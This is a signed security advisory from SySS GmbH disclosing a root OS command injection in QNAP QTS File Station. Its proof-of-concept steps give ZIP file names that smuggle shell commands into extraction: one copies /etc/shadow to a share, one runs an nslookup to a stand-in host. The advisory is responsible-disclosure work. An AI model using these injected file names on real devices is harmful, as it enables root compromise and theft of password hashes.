-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2016-048 Product: QNAP QTS Manufacturer: QNAP Affected Version(s): 4.2.0 Build 20160311 and Build 20160601 Tested Version(s): 4.2.0 Build 20160311 - 4.2.2 Build 20160812 Vulnerability Type: OS Command Injection (CWE-78) Risk Level: High Solution Status: unfixed Manufacturer Notification: 2016-06-03 Solution Date: tbd. Public Disclosure: 2016-08-18 CVE Reference: Not assigned Author of Advisory: Sebastian Nerz (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: QTS is the operating system used by manufacturer QNAP on its series of NAS devices (see [1]). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The SySS GmbH found an os command injection in the file station of the current QTS administrative interface. This type of vulnerability allows an attacker to run arbitrary commands on the operating system of the host as root. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC, Build 20160311) 1. Log in to the QNAP. The user needs sufficient permissions to either rename or create ZIP files. 2. Upload or create a ZIP file with the following name: a;echo -e "cp \x2fetc\x2fshadow \x2fshare\x2fCACHEDEV1_DATA\x2f[current dir]" | bash ; echo .zip 3. Right-click on the ZIP file and select Extract > Extract to [pre-selected directory with the name of the ZIP file] (Extract > last entry) 4. The contained code will be exected, in this case: /etc/shadow copied to the current directory. Other code can of course be run as well, e.g. to display some strings on the front-display of the QNAP (tested with a 470 Pro) name the ZIP file like this and extract it: a;lcd_tool -1 PoC -2 OS-Command-Injection; echo .zip Depending on the system this might not work out of the box. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC, Build 20160601) 1. Log in to the QNAP. The user needs sufficient permissions to either rename or create ZIP files. 2. Upload or create a ZIP file with the following name: test$(nslookup examplehost).zip 3. Right-click on the ZIP file and select Extract > Extract files 4. The contained code will be executed as can be confirmed by listening on the corresponding network. The original exploit (Extract > last entry) will not work on the current release of QTS. This exploit should work on previous versions of QTS as well. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The manufacturer has not released any security update or patch so far. Administrators of QNAP QTS 4.2 installations should ensure that only trusted users/administrators have access to the device. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2016-06-03: Vulnerability discovered and reported to manufacturer 2016-06-20: Vulnerability report confirmed by manufacturer 2016-06-22: Report updated to adress (minor) changes in build 20160601 2016-07-06: Updated report confirmed by manufacturer 2016-07-06: Manufacturer asked for timeline regarding a fix 2016-07-18: Manufacturer reminded about upcoming public disclosure 2016-08-18: Public disclosure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for QNAP QTS http://www.qnap.com/qts/4.2/en/ [2] SySS Security Advisory SYSS-2016-048 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-048.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: Security vulnerability found by Sebastian Nerz of the SySS GmbH. E-Mail: sebastian.nerz-at-syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc Key ID: 0x9180FDB2 Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBCgAGBQJXtWViAAoJENEtJqSRgP2yhjUIALi90iAlcbMaJuDlxw5myP22 ULuhqRRCsqS6kR5gVrUA7eJSRHYDubXF1PlW9SoYt3bdTfRyhb1Pwf71yGggmZ+M eCS6ImGIwKvEoJNkXsWLSV9p2hd/ha/GgTPwEa0wwUJYvuBJfadthH71WlKi7e5u 68RYX3L/IO2wylkTa6L0MJU4le48EpZOZxgcuJIXTo5qt/nDDApKS3h1W3EqNAo7 hPsm2bZPiPyynxK79H8zUIaQylFjXRnyfBhPZ7EjYI2riXkya6dk6CT7qtpt2Ljk tpBFgduJCz/a+iFsa7yCk5U6cFLi4vpcXVVE4DUf/BvTwqM4y715sTdGdOWrg00= =PDqZ -----END PGP SIGNATURE-----